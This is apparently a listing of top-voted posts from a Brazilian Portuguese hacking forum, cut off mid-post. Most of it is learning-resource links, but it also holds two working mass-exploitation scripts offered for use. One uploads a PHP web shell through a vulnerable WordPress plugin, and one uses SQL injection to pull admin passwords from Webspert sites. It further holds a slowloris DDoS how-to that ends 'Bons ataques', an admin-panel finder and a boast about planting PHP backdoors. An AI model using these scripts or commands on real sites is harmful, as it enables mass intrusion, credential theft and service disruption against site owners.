    Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária. #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)
  16. 2 pontos
    Bom dia, boa tarde, boa noite! Hoje temos um tutorial de como achar ips conectados na sua rede e indentificar os sistemas operacionais que rodam nos mesmos! Vou estar utilizando o Nmap para tal façanha. Vamos começar. [email protected]# nmap -sP 192.168.0.1-255 | grep 192 | cut -d ' ' -f 5 > ips.txt [email protected]# nmap -O -iL ips.txt Pronto, vc descobriu os hosts e os sistemas, mas vc sabe o que faz cada comando? Veja abaixo :v nmap Ele chama o programa nmap. -sP ele vai fazer um ping scan, ou seja ele vai pingar o ip selecionado para ver se esta ativo ou não! 192.168.0.1-255 Aki eh sua faixa de rede, mas isso vai depender de cada rede, pode ser 192.168.1.1 por exemplo, mas o que eu quero explicar aki é a parte do 1-255, isso vai fazer com q o ping scan percorra da faixa 192.168.0.1 até 192.168.0.255,resumindo vai percorrer toda essa faixa de rede e fazer um ping nela. Sem o resto dos comandos ficaria mais ou menos assim. Pronto, achamos os ips da rede, mas tem coisa q nós n vamos usar, entao vamos para os outros comandos! | Quando vc coloca | no terminal ele concatena um comando de outro programa no resto dos comandos! grep ele filtra a linha em q tem a palavra chave, no caso 192. Ficaria mais ou menos assim. ja estamos proximos do final, mas vamos filtrar mais um pouco! cut o cut, ele corta as palavras, por exemplo abacaxi, laranja, uesli com outros parametros vc escolhe a palavra q quer, e só ela aparecerá -d aki vc coloca o que esta separando as palavras ou frase, no caso espaços, entao: ' ', (o que estiver separando, deve estar em aspas) -f aki colocamos qual coluna esta a palavra q vc quer, colocamos q o q esta separando sao espaços, aki colocamos dps de quantos espaços está nossa palavra! sao 4, mas coloque 5, dps pesquisem pq... > joga para algum arquivo, no caso ips.txt (se n existir ele cria) pronto temos uma lista com todos os ips da sua rede! [email protected]# nmap -O -iL ips.txt Agora vamos descobrir os sistemas operacionais! -O chama a função de descobrir o Sistema operacional -iL permite que chamamos uma lista para fazer um scan de varios ips ao mesmo tempo (por isso tivemos que fazer tudo isso a cima), logo passamos a lista q criamos! E deve resultar nisso. as portas e o sistema operacional de todos os ips que sejam maquinas.
  17. 1 ponto
    Tópicos Introdutórios em Computação Forense Fala pessoal , tudo bem com vocês ? deixar hoje um material muito bom que pode auxiliar quem estiver querendo se aprofundar na aréa da pericia forense. é um livro da editora fábrica de noobs que acabei pesquisando e achando vou deixar o link aqui pra acesso de todos! Link https://goo.gl/VBgm9s
  18. 1 ponto
  19. 1 ponto
    Título Original: Learning Web Development with Bootstrap and AngularJs. Tipo: PDF Idioma: Inglês Editora: Packet Pub Download: Google Drive Este livro estava disponível gratuitamente no Packet Pub e baixei, porém estava esquecido.
  20. 1 ponto
    Obrigada, acabei de resolver o problema
  21. 1 ponto
    Sabemos que a base para toda a tecnologia que temos hoje em dia surgiu da matemática. Os primeiros programadores, técnicos em informática e qualquer pessoa que fosse trabalhar diretamente com um computador, precisavam conhecer muitas regras matemáticas e fórmulas complexas para aplicar manualmente no processador de computador. Uma outra curiosidade é que muitas pessoas formadas em matemática trabalhavam como computadores, ou seja, era um cargo dentro de uma empresa onde o funcionário tinha que COMPUTAR informações e cálculos quase que DE CABEÇA. (diferente de hoje em dia, que apenas com uma simples planilha digital conseguimos fazer o trabalho muito mais rápido). Vemos então uma grande importância imensa da matemática na criação, na manutenção e, principalmente, no processamento de informações dos computadores em geral. Um pouco da história da matemática! Na programação?! A matemática por si só já é de grande importância para os conceitos tecnológicos. Vemos também que diversos conceitos da própria lógica de programação estão estritamente ligados com a matemática: Vetores e arrays = são conjuntos numéricos e matrizes dentro da matemática; Estruturas de decisões(if, while, for..) = são os processos lógicos que utilizamos para resolver problemas do cotidiano; Algoritmo = um passo a passo (algoritmo de Briot Ruffini é um passo a passo matemático para resolver cálculos) Operadores aritméticos Operadores lógicos = trabalhamos com Binários, logaritmos, base diferente da decimal Simbologias = >, <, =, ++, --, Criptografia Entre outras coisas, o próprio método e pensamento lógico para a criação de um algoritmo / resolução de problemas Então podemos afirmar que é de grande importância aprender a aplicar os conceitos da matemática pura em programação, pois sem ela teremos um sistema fraco e sem um embasamento matemática;
  22. 1 ponto
    Instale um interpretador perl: https://www.activestate.com/activeperl/downloads Ou https://www.perl.org/get.html Hello guys, hoje vou mostrar um tutorial de DDoS usando a ferramente slowloris, link: https://github.com/llaera/slowloris.pl/…/master/slowloris.p lVulnerável: Apache 1.x Apache 2.x dhttpd GoAhead Webserver Não vulnerável: IIS 6.0 IIS 7.0 lighttpd Squid nginx Como usar :-dns = Serve para indicar o IP ou domínio do site, exemplo: -dns 127.0.0.1 -port = Porta para ataque, 80 é a default ( Se não me engano ) -timeout = Tempo de espera de cada ataque, é como o tempo de espera entre cada martelada -num = Número de pacotes (Já derrubei alguns usando só 10 K) Dependências para rodar o programa:( Lembrando que você deve ter um interpretador perl instalado) Vá no terminal e digite: cpan install IO::Socket::INET cpan install IO::Socket::SSL cpan install Getopt::Long Agora aqui temos um exemplo de ataque: perl slowloris.pl -dns 177.xxx.xx.xx -port 80 -num 10000 No caso não precisa colocar -port 80 por causa que a porta 80 é a padrão caso não seja especificada. Bons ataques
  23. 1 ponto
  24. 1 ponto
    E ae galera, segue a lista de algumas ferramentas: 1 - Python3 for Android 2 - Routerpwn 3 - Hash Decrypt 4 - dSploit 5 - DynDNS Client 6 - Mac Address Ghost 7 - Proxy Browser 8 - AirMon 9 - Router Brute Force 10 - Nessus 11 - Loic 12 - ProxyDroid 13 - Admin Panel Finder 14 - Root Browser 15 - DroidWall 16 - IP Tools 17 - Fing 18 - Bugtroid FREE 19 - ConnectBot 20 - SQLCipher Decrypt/Encrypt 21 - Wps Wpa Tester 22 - Wifi Password 23 - zANTI 24 - Intercepter-NG 25 - BusyBox Free 26 - Lan Droid
  25. 1 ponto
    E aí pessoal, hoje trago à vocês um curso de redes de computadores, matéria essencial para estudos sobre hacking e segurança da informação, contendo com 52 vídeos, com uma explicação curta e fácil de entender, distribuído pela Bóson Treinamentos de forma gratuita. LINK: https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU
  26. 1 ponto
    Deixo hoje pra aqueles que querem se aprofundar no assunto de segurança se tratando de apps mobile ou do próprio android em si . é uma palestra antiga , mas dar pra se aproveitar muita coisa do material . link https://goo.gl/bdxVhB
  27. 1 ponto
    Mano vc não conta com nenhum meio de recuperação usado pelo provedor de email? Tipo: recupreação por celular, outro e-mail de recuperação... Assim é muito vago, teria que obter mais informações, lembra da ultima senha usada? Vc entra no email pelo PC ou por esse seu aparelho Motorola? Usava a senha referida a algum tema? Como por exemplo Harry Potter (que vc gosta tamto), Reliquias da Morte e etc... algo que lembre a senha?
  28. 1 ponto
    Github https://github.com/commixproject/commix Leia a documentação
  29. 1 ponto
    LINK wreducacional.com.br
  30. 1 ponto
    Esse é um pequeno index de sites úteis de ensino, como EaDs ou indexadores de canais no youtube, e todos que cito agora já usei muito . CodeCademy- Um site completo com diversas linguagens, sejam elas de programação ou HTML/CSS. O único problema é que ela possui um sistema premium pago, o que estritamente é relativo à baixa apresentação dos tópicos, com um ensino mais básico. Khan Academy - Um site mais que completo, com todos os assuntos possíveis, matemática, biologia, geografia, história, programação, e MUITO MAIS! E o melhor, nem todo o conteúdo está em português então aproveite para estudar inglês. E o curso de JavaScript usa uma biblioteca de animação (que esqueci o nome) com um quadro interativo áudio/texto. W3Schools - Esse é focado em programação Web, tendo tutoriais como ASP.NET, PHP, CSS, HTML, JS, Jquery, etc. É uma boa referência quando queremos "dar uma checada" naquele código que esquecemos. YouCource - Dito "O maior ead gratuito da internet" contém uma gama enorme de apetrechos e cursos ligados ao Youtube, como Arduino, C, C#, Python, Jogos, Banco de Dados, Frameworks, e etc. Ou seja, uma coletânea de playlists do Youtube para estudar. Tutorials Point - Acredito que esse sim é o maior ead gratuito da internet! Tem de TUDO, TUDO!!!. Desde Futebol até programação. Um ótimo site para ter como referência. eXcript - Um site brasileiro de tutoriais de programação, tem bastante linguagem, e o dono é até membro de um grupo do Facebook que participo. É bem completo e focado, explicação sem complicação. LeLivros - Site com diversos livros, de culinária, filosofia, auto-ajuda, literatura, e etc. PyCursos - Estuda Python? Quer re-estudar tudo? Aprenda no PyCursos, site focado na linguagem Python. Pra quem quer e até quem não quer é uma boa pedida.
  31. 1 ponto
    Sou compromissado, então, o único diferencial em ir para a presencial seria, mais chance de ser assaltado, e gastar mais passagem.
  32. 1 ponto
    Qual a importância do inglês para o TI? Bom, nos últimos dias eu ando trazendo alguns ótimos livros de Ti e Hacking escritos na língua inglesa. porém eu vejo que muitos usuários do grupo e do fórum não sabem nem o básico do English. "Tá, mas, qual é o problema?". O problema é que se você é um rapaz ou moça que quer entrar no mundo da computação e ainda mais no hacking, você tem que saber inglês, caso contrário você será praticamente um analfabeto funcional(na área). Se você não se esforçar para aprender o idioma provavelmente você não vai a lugar algum(existem exceções). Outro problema é a quantidade e a qualidade do material escrito em inglês, veja só a comparação que eu fiz abaixo: Pesquisando o termo: Aprender Python (em português) Pesquisando o Termo: Aprender Python (em inglês) Não tem nem como comparar, 500 mil resultado em português, e mais de 15 milhões em inglês, sério mano você não sabe o que está perdendo ficando apenas com seu idioma nativo, saia desse mundo opaco e venha para a globalização. COMO APRENDER INGLÊS: Vou fazer um passo a passo bem direto ao ponto, é só você seguir ele. 1° Passo: Descubra em qual nível você está, eu costumo dividir em 4: Zero, Básico, Intermediário e Avançado. Esse site aqui tem um sistema de nivelamento: http://www.testemeuingles.com 2° Passo: Agora que você descobriu o seu nível faça os seguintes passos: Zero: Como você provavelmente não deve saber merda nenhuma do idioma, comece pelo o Duolingo, esse app dar uma ótima base e eu te garanto que tu vai aprender muito por lá até chegar ao básico. o app é muito interativo, não é possível que vc não saiba como usar. Tempo: 1 mês praticando 30 minutos por dia você já terá toda a base do inglês. ( Agora tem que ser todo dia seu fdp preguiçoso) Link: https://pt.duolingo.com Básico: Quando você chegar aqui o negocio começa a ficar bom, o que você vai fazer é simples, vai começar a acessar sites em inglês, tipo sites de entretenimento, esportes, política e etc. vai começar a ler artigos que te interessam, e toda vida que aparecer uma palavra ou expressão que você não saiba tu vai fazer o seguinte: OBS: Recomendo ler HQs também 1° Use um dicionário, não se prenda a tradutores(apesar de serem muito bons tb). "Tá mas por que um dicionário?" bom por que no inglês é muito comum uma palavra ter dezenas de significados e provavelmente o dicionário vai te mostrar todos e ainda vai le dar exemplos de expressões usadas com aquela palavra. diferente dos tradutores. Bons dicionários: http://www.wordreference.com/enpt/ http://dictionary.cambridge.org/pt/dicionario/ingles-portugues/ http://pt.bab.la/dicionario/ingles-portugues/ OFF: Ainda tem o dicionário de gírias : http://www.urbandictionary.com Tempo: 5 meses até o intermediário 2° Use o tradutor só em casos extremos e que necessitem de uma rápida leitura. Não vou recomendar o google tradutor por que ele é ruim para o k*l, mas sim o bing, o tradutor do bing é muito bom cara: https://www.bing.com/translator Intermediário: Essa é a parte de você exercitar o ouvido e aprender os fonemas da língua inglesa. Já que agora você já tem uma ótima base do idioma está na hora de pegar a sua série/filme favorito(a) e colocar eles no idioma inglês junto com a legenda também em inglês para te dar suporte. Depois quando você estiver acostumado com os fonemas vai tirando as legendas de leve e tenta assistir sem. apartir do momento que você estiver conseguindo escutar e entender perfeitamente(sem o auxilio de legendas) o que está se passando na sua série/filme você já estará praticamente no nível avançado do idioma. Avançado: Essa parte é a mais foda, é aqui que você deve começar a ler livros técnicos em inglês, aprender vocábulos não muito famosos, e conversar com gringos pela net, por que não? também você deve frequentar comunidades e fóruns para trocar ideias com pessoas de outros países. Quando tudo estiver fluindo perfeitamente , você já pode dizer que fala/ler/escuta bem em inglês. Outra dica que servem para todos os níveis: entre de cara no idioma, mude a linguagem do seu pc e smartphone para inglês, deixe aos poucos de usar apps em inglês. Então é isso, foi mal pela a organização
  33. 1 ponto
    Novo site para consultar dados. link www.telefone.ninja "API"
  34. 1 ponto
    Eu comprei 4 cursos em uma plataforma de estudos EAD, estou começando pelo curso de Android, nele tem aulas de Java, o que vai me ajudar no curso técnico também. E até agora, estou gostando bastante do dinamismo do curso, a plataforma é excelente. O curso é da Udemy, aproveitei bastante as promoções para novos alunos que teve essa semana, mas recomendo fortemente esses cursos. Principalmente para iniciantes como eu, hehe. Espero ter ajudado
  35. 1 ponto
    Ferramenta para achar local Admin (link no final do tópico) Requerimentos: Python 2.7 mechanize PySocks beautifulsoup4 html5lib Nmap (--nmap) TOR (--tor) Instalação: Linux git clone http://github.com/fnk0c/cangibrina.git cd cangibrina pip install -r requirements.txt Uso uso: cangibrina.py [-h] -u U [-w W] [-t T] [-v] [--ext EXT] [--user-agent] [--tor] [--search] [--dork DORK] [--nmap [NMAP]] Rápido e poderoso admin finder argumentos opcionais: -h, --help mostra esta mensagem de ajuda e sai -u U site alvo -w W define wordlist (padrao: wl_medium) -t T define numero de threads (padrao: 5) -v habilita verbose --ext EXT filtra diretorio pela extensao do alvo --user-agent modifica user-agent --tor define TOR proxy --search usa google and duckduckgo para procurar --dork DORK define dork personalizada --nmap [NMAP] usa nmap para escanear portas e servicos Exemplos python cangibrina.py -u facebook.com python cangibrina.py -u facebook.com -v python cangibrina.py -u facebook.com -w /root/diretorios.txt -t 10 -v python cangibrina.py -u facebook.com --search -v python cangibrina.py -u facebook.com --search --dork 'site:facebook.com inurl:login' python cangibrina.py -u facebook.com -v --nmap python cangibrina.py -u facebook.com -v --nmap 'sudo nmap -D 127.0.0.1 -F facebook.com' python cangibrina.py -u facebook.com --user-agent python cangibrina.py -u facebook.com --ext php [IMPORTANTE] DORK DEVE SER ESCRITA ENTRE ASPAS ! [Exemplo] 'inurl:login.php' Cangibrina
  36. 1 ponto
    Script para realizar brute force em diretorios web, usando python e requests
  37. 1 ponto
    Hello World! Vos trago uma coleção de canais do YouTube e sites que ministram cursos totalmente grátis em pt-BR que abordam desde os nossos simples e queridos HTML e CSS, até linguagens de programação como Python, PHP e etc. Sabe de mais algum? Comenta ae! Aulas de Programação Canal: https://www.youtube.com/channel/UCqromb78N3C06M_PFUh6rZw/feed Bóson Treinamentos Site: http://www.bosontreinamentos.com.br/ Canal: https://www.youtube.com/user/bosontreinamentos Caffeine Algorithm Site: http://caffeinealgorithm.com/ Canal: https://www.youtube.com/channel/UCdt_qK8rmpxrq942ZFIqxvQ Curso em Vídeo Site: www.cursoemvideo.com Canal: https://www.youtube.com/channel/UCrWvhVmt0Qac3HgsjQK62FQ CC50 Site: http://cc50.com.br/ Canal: https://www.youtube.com/channel/UCQ1hTV3di1jEYEnpH4E0ykQ Elvis de Freitas Canal: https://www.youtube.com/user/baixarcentral Estevan Maito Canal: https://www.youtube.com/channel/UCIUOmAsotrzdK8VsZuHfVHw Eu Programador Canal: https://www.youtube.com/channel/UC7c2c7E1L9xhCinShl8-iZA eXcript Canal:https://www.youtube.com/channel/UCRu4BNG9k_BRUu-aCYJsgHg HxTutors Canal: https://www.youtube.com/channel/UC-KV2g7wDXFPLqEFan4oeBQ Matheus Lima Canal: https://www.youtube.com/channel/UCFpR8oEW2cdEj6PgbVZbjDw Node Studio Canal: https://www.youtube.com/channel/UCZZ0NTtOgsLIT4Skr6GUpAw PokePHP Canal: https://www.youtube.com/channel/UCNdrk5t7m7YfejV6K7NBNNw PontoCanal Site: http://pontocomdesenvolvimento.net/ Canal: https://www.youtube.com/channel/UCQjVM9M1rvPjiidoqTQ0z8g RBtech Site: http://rbtech.info/ Canal: https://www.youtube.com/channel/UCVEa_x1n5FwWrxH00MrDPzQ Rodrigo Branas Canal: https://www.youtube.com/channel/UCkqOofjb7nl6V8vXrIbGtiQ Webschool.io - JavaScript Site: http://webschool.io/ Canal: https://www.youtube.com/channel/UCKdo1RaF8gzfhvkOdZv_ojg/playlists FIAP X Site: https://www.fiap.com.br/fiapx/cursos CodeCademy Site: https://www.codecademy.com/pt-BR JS Casts Site: http://jscasts.teachable.com/ Fundação Bradesco Site: http://www.ev.org.br/CURSOS/Paginas/Online.aspx Learncafe Site: http://www.learncafe.com/cursos-gratis/informatica-e-internet Udemy Site: https://www.udemy.com/courses/it-and-software/all-courses/?price=price-free〈=pt Coursera Site: https://pt.coursera.org/browse/computer-science?languages=pt Veduca Site: http://veduca.org/courses Jornada do Dev Site: http://jornadadodev.com.br/cursos TIM Tec Site: http://cursos.timtec.com.br/ Cod3r Canal: https://www.youtube.com/channel/UCqromb78N3C06M_PFUh6rZw Torne-se um Programador Site: http://www.torneseumprogramador.com.br/
  38. 1 ponto
    PRINCIPAIS CANAIS DO YOUTUBE SOBRE TECNOLOGIA/HACKER Penetration Testing Alef Carvalho Alisam Technology Ares TI CaveiraTech Ciência Hacker Clavis Segurança da Informação Crazy Danish Hacker d1gg3r us Darkcode Hacking DEDSEC TOOL Deep Web Brasil DioLinux Diego Maciel Esecurity Treinamentos FenixSec Fábrica de Noobs Koshimaru Kisara Pesadelo Do Sistema Limon Tec Life Hacker Papo Binário Programação e Hacking Ricardo Longatto Roadsec Segurança Digital Sombra Hp Magno Tutor Portal Geek Live Xtreme Security Segurança Cavinato Hacker Security Nicholas Ferreira Jonatas Fil
  39. 1 ponto
    Boa! Parece bobeira, mas já ouvi relatos de galera que não passou em entrevista de emprego por não saber conceito de Roteador e Modem. Diferenças, etc. Vale sempre praticar.
  40. 1 ponto
    Github https://github.com/reverse-shell/routersploit
  41. 1 ponto
    WEBSPERT_SQLinjection_mass_exploit E ai pessoal, criei esse exploit em massa que realiza SQL Injection via GET no "CMS" Webspert a qual esta vulneável a falha, e a partir desse exploit, conseguimos pegar a senha e o usuario do administrador. O exploit foi escrito em Python e necessário as bibliotecas: Requests e Colorama. Para instala-las: pip install requests/pip install colorama OU easy_install requests/easy_install colorama. #!/usr/bin/python try: try: from colorama import * import colorama except ImportError: print "[!] ERROR! Biblioteca colorama nao disponivel!\n Instale com: pip install colorama" sys.exit(1) import requests import platform import time import sys import os import re colorama.init() so = platform.system() if so == "Linux": cleaning = os.system("clear") else: cleaning = os.system("cls") print Fore.GREEN+""" *********************************** ***** MASS EXPLOIT ***** ***** WEBSPERT SQL INJECTION ***** ***** ***** *********************************** +++++++++++++++++++++++++++++++++++++++++++++++++ Desenvolvido por Derick Santos Conheca a Fsociety Brasil: https://www.fsocietybrasil.org/ """ web = raw_input(Fore.YELLOW+"Lista de sites: ") site = open(web) for sites in site: host = sites.rstrip() print Fore.BLUE+"\n[!] ALVO - {}\n".format(host) payload_id = "%27" r = requests.get("http://"+host+"/"+payload_id) code = r.text if r.status_code == 200: print Fore.BLUE+"[!] O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"\n[!] Aplicando payload de exploracao!" payload_vul = "&pageid=26 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5,6 from administrators--" r = requests.get("http://"+host+payload_vul) html = r.text if re.search("admin",html): time.sleep(3) print Fore.GREEN+"\n[!] O SITE E VULNERAVEL!\n Coletando senha do administrador..." passe = re.findall(r'admin[\w:]+[\w,]+[\w:]+[\w:]+[\w<]', html) for senha in passe: password = senha.rstrip() if password == "administrator": print "" time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: print Fore.RED+"\n[!] Site nao vulneravel!" except ImportError: print Fore.RED+"[!] ERROR! Biblioteca requests nao disponivel!\n Instale com: pip install requests" except KeyboardInterrupt: print Fore.RED+"Ate mais!"
  42. 1 ponto
  43. 1 ponto
    [align=center][/align] [align=center]30 artigos sobre criptografia e afins, aproveitem[/align] [align=center]Download: https://goo.gl/vG1Qnq[/align]
  44. 1 ponto
  45. 1 ponto
    Adorariamos suas aulas Nao esqueca de compartilhar no grupo tbm, infelizmente a maioria dos membros da Fsociety Brasil esta la... https://www.facebook.com/groups/fsocietybrasil/
  46. 1 ponto
    Meus caros... Ultimamente eu venho observando um bando de preguiçosos querendo aprender práticas hackers... Desde hackear o WiFi da escola (sim, escola... pois eu percebi que muitos estão no ensino básico) e Facebook... até hackear a NSA (hahahaha). Eu não sou nenhum Kevin Poulsen ou Elliot Alderson, mas por exemplo, não pego senha de WiFi por cracking, pois na maioria das vezes demora e... nem todos os pontos de acesso têm WPS habilitado (poucos... mas ainda sim não são habilitados). Existem outras maneiras muito mais rápidas e infalíveis. Eu já adquiri uma senha, um pouco complexa, em apenas 2 ~ 3 minutos. A senha? Segue: [email protected] Você acredita que eu fiz isso no meio do Atacadão, um atacadista que tem a própria equipe de TI na loja?! Não? Então você deve aprender essa prática. E eu estou disposto a passar para algumas pessoas o que eu sei (já disse, não sou nenhum hackudão e/ou black hat). Aliás. A senha, pelo o que pesquisei, nakupenda, trata-se de um dialeto africano, salvo engano. Mas também existe uma praia com esse nome e algumas pessoas utilizavam como sobrenome no Orkut (perdoem-me, só passei os olhos nos resultados). Enfim... Eu já deixei escapar que eu tenho centenas de ferramentas, linhas de códigos e artigos úteis. Eu irei criar alguns desafios e quem conseguir completá-los, caso queira, poderei disponibilizar o arsenal e compartilhar meu conhecimento. E aí. Partiu colocar um backdoor indetectável em uma plataforma php sem deixar rastros (supondo que você seja o administrador)? Mesmo sem ter direitos o suficiente? Xi... Tem que estudar essas técnicas. =) Also, administradores e moderadores, perdoem-me pelo título, mas eu não consegui pensar num título melhor.
  47. 1 ponto
    Tudo bem que é sexta-feira, dia de maldade, mas vamos com calma.
  48. 1 ponto
    https://www.profissionaisti.com.br/2017/05/os-melhores-cursos-baratos-de-ti-de-toda-a-internet/
  49. 1 ponto
    Scan exploit cve-2017-010 Eternalblue-doublepulsar Ta ai um scanner pra verificar se o sistema alvo esta vulnerável a falha ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # auxiliary/scanner/smb/smb_ms_17_010 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'MS17-010 SMB RCE Detection', 'Description' => %q{ Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\\" and connect to IPC$. }, 'Author' => [ 'Sean Dillon <[email protected]>' ], 'References' => [ [ 'CVE', '2017-0143'], [ 'CVE', '2017-0144'], [ 'CVE', '2017-0145'], [ 'CVE', '2017-0146'], [ 'CVE', '2017-0147'], [ 'CVE', '2017-0148'], [ 'MSB', 'MS17-010'], [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] ], 'License' => MSF_LICENSE )) end def run_host(ip) begin status = do_smb_probe(ip) if status == "STATUS_INSUFF_SERVER_RESOURCES" print_warning("Host is likely VULNERABLE to MS17-010!") report_vuln( host: ip, name: self.name, refs: self.references, info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' ) elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE" # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) print_good("Host does NOT appear vulnerable.") else print_bad("Unable to properly detect if host is vulnerable.") end rescue ::Interrupt print_status("Exiting on interrupt.") raise $! rescue ::Rex::Proto::SMB::Exceptions::LoginError print_error("An SMB Login Error occurred while connecting to the IPC$ tree.") rescue ::Exception => e vprint_error("#{e.class}: #{e.message}") ensure disconnect end end def do_smb_probe(ip) connect # logon as user \ simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) # connect to IPC$ ipc_share = "\\\\#{ip}\\IPC$" simple.connect(ipc_share) tree_id = simple.shares[ipc_share] print_status("Connected to #{ipc_share} with TID = #{tree_id}") # request transaction with fid = 0 pkt = make_smb_trans_ms17_010(tree_id) sock.put(pkt) bytes = sock.get_once # convert packet to response struct pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct pkt.from_s(bytes[4..-1]) # convert error code to string code = pkt['SMB'].v['ErrorClass'] smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new status = smberr.get_error(code) print_status("Received #{status} with FID = 0") status end def make_smb_trans_ms17_010(tree_id) # make a raw transaction packet pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct simple.client.smb_defaults(pkt['Payload']['SMB']) # opcode 0x23 = PeekNamedPipe, fid = 0 setup = "\x23\x00\x00\x00" setup_count = 2 # 2 words trans = "\\PIPE\\\x00" # calculate offsets to the SetupData payload base_offset = pkt.to_s.length + (setup.length) - 4 param_offset = base_offset + trans.length data_offset = param_offset # + 0 # packet baselines pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode pkt['Payload']['SMB'].v['TreeID'] = tree_id pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count pkt['Payload'].v['ParamCountMax'] = 0xffff pkt['Payload'].v['DataCountMax'] = 0xffff pkt['Payload'].v['ParamOffset'] = param_offset pkt['Payload'].v['DataOffset'] = data_offset # actual magic: PeekNamedPipe FID=0, \PIPE\ pkt['Payload'].v['SetupCount'] = setup_count pkt['Payload'].v['SetupData'] = setup pkt['Payload'].v['Payload'] = trans pkt.to_s end end
  50. 1 ponto
    E ae gelera, hoje vamos falar sobre footprinting. A coleta de informações (ou footprinting) é a primeira etapa que deve ocorrer em um pentest. O reconhecimento consiste em obter todas as informações a respeito da rede (topologia, mapeamento, servidores, funcionários etc.). Quanto mais informações coletadas, maior a probabilidade de acesso ao sistema auditado. Todas as informações relacionadas ao segmento da empresa - servidores, roteadores, firewalls, hábitos dos funcionários e sua capacitação, pessoas relacionadas á empresa, empresas terceirizadas, emails, facebook, telefones, informações jogadas no lixo etc. - auxiliam ao processo de coleta de informações. Podemos aplicar a engenharia social, a qual contribuirá de forma significativa com o aumento das informações pesquisadas. Por meio das informações do Google, do Yahoo e de outros mecanismo de busca, em poucas horas conseguimos uma gama de informações que potencializa o teste de intrusão. Um bom inicio para coletar informações é começar pesquisando no site alvo. Comece lendo o site, veja quais são os dominios associados etc. Obtenha o maximo de informações que conseguir. Com certeza o leitor encontrará emails de contato, nomes relacionados á administração e outras informações bem interessantes. Com essas informações é possivel criar uma lista de palavras que servirá para futuros ataques (como quebra de sistemas de login - HTTP, SMTP, WPA2 etc). Acredite, sites revelam muitas informações a respeito do nosso alvo, vale a pena checá-lo. Uma dica que lhe dou é também buscar informações do site em repositorios como o archive.org. O Passado de um site é revelado. Com as informações básicas enumeradas, o próximo passo para montarmos o nosso plano de ataque é coletar informações a respeito do domínio a ser testado. O domínio vai exibir dados públicos que podem ser de interesse para atacantes. Realizado uma busca no domínio do nosso alvo, obtemos informações como email do responsável, servidores DNS (que serão utilizados para enumeração DNS e transferência de zona), país etc. O comando whois do Linux pode ser usado para buscar e enumerar informações de um domínio em órgãos regulamentadores. Mas antes de de utilizá-lo, vamos entender como funciona a estrutura de domínios na internet. Cada país possui um órgão regulamentar de domínios. Por exemplo, no Brasil, o responsável por regulamentar o domínio é o registro.br. Cada órgão regulamentador é controlado por uma entidade superior. Por exemplo, o registro.br é vinculado ao Lacnic (Entidade responsável pelo gerenciamento de domínios da América Latina. O órgão responsável pelo gerenciamento de todos os continentes é p IANA (a futura organização será a ICANN). Abra o seu terminal e digite: whois www.site.com.br Exemplo: whois www.microsoft.com.br As informações báscias são exibidas (servidores DNS, a pessoa responsável por aquele domínio juntamente com o email dela), será necessário realizara enumeração DNS. A enumeração DNS é um passo importante para o mapeamento da infraestutura da rede, pois com o 